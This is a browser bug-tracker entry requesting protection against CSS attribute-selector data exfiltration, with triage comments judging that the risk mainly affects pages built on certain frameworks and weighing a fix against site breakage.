Open Bug 1531601 Opened 5 years ago Updated 10 months ago

css exfil protection (protection against attribute selectors extracting data from HTML attributes)

Categories

(Core :: CSS Parsing and Computation, defect, P3)

Product:
Core
Component:
CSS Parsing and Computation
Type:
defect

Tracking

()

Status:
UNCONFIRMED

People

(Reporter: jrdn.wms, Unassigned)

Details

User Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0

Steps to reproduce:

visit this CSS Exfil Vulnerability Tester
https://www.mike-gualtieri.com/css-exfil-vulnerability-tester

Actual results:

See faces

Expected results:

I would get green checkmarks

further information
https://www.mike-gualtieri.com/posts/stealing-data-with-css-attack-and-defense
https://addons.mozilla.org/en-US/firefox/addon/css-exfil-protection/
https://github.com/mlgualtieri/CSS-Exfil-Protection

I couldn't find a bug report for this topic so I figured I'd put one in on it

Group: firefox-core-security → layout-core-security
Component: Untriaged → CSS Parsing and Computation
Product: Firefox → Core
Version: 60 Branch → unspecified

I'm going to unhide this because it is based on a year-old blog post.

David, any thoughts?

Group: layout-core-security
Flags: needinfo?(dbaron)
Whiteboard: [layout:triage-discuss]

FWIW Xidorn raised this in the CSSWG last year, but he came to the conclusion that it's an issue for framework developers rather than browsers and their selector matching: https://github.com/w3c/csswg-drafts/issues/2339

Priority: -- → P3

I'd note that I think the blog post rather overstates the severity of these attacks because form controls don't (in the platform) reflect user input into the value attribute. Instead, the defaultValue DOM property reflects the HTML value attribute, and the value DOM property contains the user input.

However, some frameworks (e.g., react) may change this model.

So I think this is a problem that applies to pages that use certain frameworks but not pages in general.

I suppose the suggested fix here is to break cross-domain image loading when it's triggered from an attribute selector. It's not clear to me what the tradeoff is between (a) sites that would be broken and (b) developers that would be confused against any security benefits to sites that use such frameworks and would hit this issue.

Flags: needinfo?(dbaron)
Summary: css exfil protection → css exfil protection (protection against attribute selectors extracting data from HTML attributes)
Whiteboard: [layout:triage-discuss]
Severity: normal → S3
You need to log in before you can comment on or make changes to this bug.